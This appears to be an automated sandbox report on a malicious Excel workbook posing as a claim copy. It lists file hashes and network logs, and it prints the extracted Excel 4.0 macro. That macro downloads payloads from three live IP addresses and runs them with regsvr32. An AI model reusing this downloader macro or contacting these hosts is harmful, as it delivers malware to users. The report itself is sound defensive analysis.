                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                Category:dropped
                Size (bytes):85681
                Entropy (8bit):7.915850776614707
                Encrypted:false
                SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                MD5:4F100E2CEFED046B44EC799015B454EF
                SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                C:\Users\user\Desktop\6FC30000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Excel 2007+
                Category:dropped
                Size (bytes):99418
                Entropy (8bit):7.830598578936149
                Encrypted:false
                SSDEEP:1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC
                MD5:3AEEF9C5D82677775B1050AAF5887584
                SHA1:ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557
                SHA-256:1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75
                SHA-512:D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2
                Malicious:false
                Reputation:low
                Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                C:\Users\user\Desktop\6FC30000:Zone.Identifier
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview: [ZoneTransfer]....ZoneId=0
                C:\Users\user\Desktop\ClaimCopy-539408676-12022021.xlsbE. (copy)
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Excel 2007+
                Category:dropped
                Size (bytes):99418
                Entropy (8bit):7.830598578936149
                Encrypted:false
                SSDEEP:1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC
                MD5:3AEEF9C5D82677775B1050AAF5887584
                SHA1:ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557
                SHA-256:1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75
                SHA-512:D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2
                Malicious:true
                Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                C:\Users\user\Desktop\~$ClaimCopy-539408676-12022021.xlsb
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):165
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                MD5:797869BB881CFBCDAC2064F92B26E46F
                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.831010211626038
                TrID:
                • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                • ZIP compressed archive (8000/1) 16.49%
                File name:ClaimCopy-539408676-12022021.xlsb
                File size:99677
                MD5:4b4aacfd637f34a8c9111d80578bf275
                SHA1:86b477fdaa06a4fcd7e863af0b7dc9321b9978e4
                SHA256:04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f
                SHA512:0e5babb339a32868b4198c7d2d4714638033602f12bb30582766ae4de5feb8ec41b3ba18e2e36476a5676b97d8312f818daeb4364dd81faf3fa567a17a013c31
                SSDEEP:1536:hMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:Nc6EehCfCZpUHKGXbBKsiiOp
                File Content Preview:PK..........!...~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2ea8aa4b4b4b4

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "ClaimCopy-539408676-12022021.xlsb"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                8,6,=Drozd(0,"http://185.82.126.78/397887857128.dat","C:\ProgramData\Volet1.ocx",0,0)
                9,6,=Drozd(0,"http://158.69.133.78/397887857128.dat","C:\ProgramData\Volet2.ocx",0,0)
                10,6,=Drozd(0,"http://45.142.211.62/397887857128.dat","C:\ProgramData\Volet3.ocx",0,0)
                11,6,=Drozd(0,"http://45.142.211.62/397887857128.dat2","C:\ProgramData\Volet4.ocx",0,0)
                12,6,=Drozd(0,"http://185.82.126.78/397887857128.dat2","C:\ProgramData\Volet5.ocx",0,0)
                13,6,=Drozd(0,"http://158.69.133.78/397887857128.dat2","C:\ProgramData\Volet6.ocx",0,0)
                15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
                16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
                17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
                18,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet4.ocx")
                19,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet5.ocx")
                20,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet6.ocx")
                23,6,=HALT()
                
                1,1,523
                4,9,34543
                4,12,43
                5,2,ui
                5,9,7
                5,14,43
                6,14,36
                7,0,ug
                7,1,&#208;&#181;&#209;&#131;5&#209;&#134;&#209;&#131;5
                8,9,34
                8,10,5
                9,1,y
                9,16,346
                10,7,rt
                10,8,345
                10,9,u
                11,2,23
                11,7,ertertyh57s5ry
                11,11,5
                11,12,35
                12,1,65
                12,2,7
                12,9,r67
                13,2,mfy
                13,7,65
                13,10,7
                13,14,34
                13,15,543
                14,0,uh
                14,1,y
                15,0,7
                15,7,65
                15,10,ae46
                16,2,d7
                16,3,uRl
                17,3,=&#34;Mon&#34;
                17,9,dt
                17,10,6
                17,12,u
                17,13,5
                18,3,=&#34;URLDownloadTo&#34;
                18,8,yu
                18,10,sb
                18,14,5
                19,3,=&#34;JJCCBB&#34;
                19,7,f
                20,0,7
                20,1,7
                20,4,185.82.126.78/
                20,7,523
                20,8,u
                21,0,md
                21,4,158.69.133.78/
                21,6,=RANDBETWEEN(142536473,988879789754)
                21,9,s
                21,11,m
                22,1,7
                22,4,45.142.211.62/
                22,6,=&#34;.dat&#34;
                22,8,6
                23,4,45.142.211.62/
                23,6,=&#34;.dat2&#34;
                23,11,4
                23,15,46
                24,4,185.82.126.78/
                24,6,=REGISTER(D17&#38;D18,D19&#38;&#34;FileA&#34;,D20,&#34;Drozd&#34;,,1,9)
                24,8,23
                24,14,6
                24,15,43
                25,1,567
                25,4,158.69.133.78/
                25,10,23
                25,13,5
                28,2,756
                37,6,=GOTO(Tiposa1!G8)
                

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                12/02/21-16:10:25.632241TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.82.126.78192.168.2.22
                12/02/21-16:10:26.574859TCP1201ATTACK-RESPONSES 403 Forbidden8049168158.69.133.78192.168.2.22
                12/02/21-16:10:29.832836TCP1201ATTACK-RESPONSES 403 Forbidden804916945.142.211.62192.168.2.22
                12/02/21-16:10:30.027399TCP1201ATTACK-RESPONSES 403 Forbidden804916945.142.211.62192.168.2.22
                12/02/21-16:10:30.211827TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.82.126.78192.168.2.22
                12/02/21-16:10:30.735520TCP1201ATTACK-RESPONSES 403 Forbidden8049168158.69.133.78192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 16:10:25.168994904 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:25.229886055 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:10:25.230056047 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:25.231389046 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:25.291949987 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:10:25.632241011 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:10:25.637115955 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:25.664262056 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:10:25.771842957 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:10:25.772038937 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:10:25.773314953 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:10:25.880645037 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:10:26.574858904 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:10:26.574981928 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:10:26.584788084 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.594575882 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.631189108 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:10:29.631477118 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.632947922 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.672388077 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:10:29.832835913 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:10:29.832989931 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.840528011 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:29.876952887 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:10:30.027399063 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:10:30.027755976 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:10:30.030435085 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:30.091200113 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:10:30.211827040 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:10:30.211921930 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:10:30.213552952 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:10:30.321049929 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:10:30.735519886 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:10:30.735712051 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:11:35.026017904 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:11:35.026089907 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:11:35.213016033 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:11:35.213315964 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:11:35.738107920 CET8049168158.69.133.78192.168.2.22
                Dec 2, 2021 16:11:35.738182068 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:12:25.061552048 CET4916980192.168.2.2245.142.211.62
                Dec 2, 2021 16:12:25.062350035 CET4916780192.168.2.22185.82.126.78
                Dec 2, 2021 16:12:25.062480927 CET4916880192.168.2.22158.69.133.78
                Dec 2, 2021 16:12:25.098237038 CET804916945.142.211.62192.168.2.22
                Dec 2, 2021 16:12:25.122937918 CET8049167185.82.126.78192.168.2.22
                Dec 2, 2021 16:12:25.169639111 CET8049168158.69.133.78192.168.2.22

                HTTP Request Dependency Graph

                • 185.82.126.78
                • 158.69.133.78
                • 45.142.211.62

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167185.82.126.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 16:10:25.231389046 CET0OUTGET /533792932717.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.82.126.78
                Connection: Keep-Alive
                Dec 2, 2021 16:10:25.632241011 CET1INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:25 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                Dec 2, 2021 16:10:30.030435085 CET5OUTGET /533792932717.dat2 HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.82.126.78
                Connection: Keep-Alive
                Dec 2, 2021 16:10:30.211827040 CET6INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:30 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168158.69.133.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 16:10:25.773314953 CET1OUTGET /533792932717.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 158.69.133.78
                Connection: Keep-Alive
                Dec 2, 2021 16:10:26.574858904 CET2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:26 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                Dec 2, 2021 16:10:30.213552952 CET7OUTGET /533792932717.dat2 HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 158.69.133.78
                Connection: Keep-Alive
                Dec 2, 2021 16:10:30.735519886 CET7INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:30 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
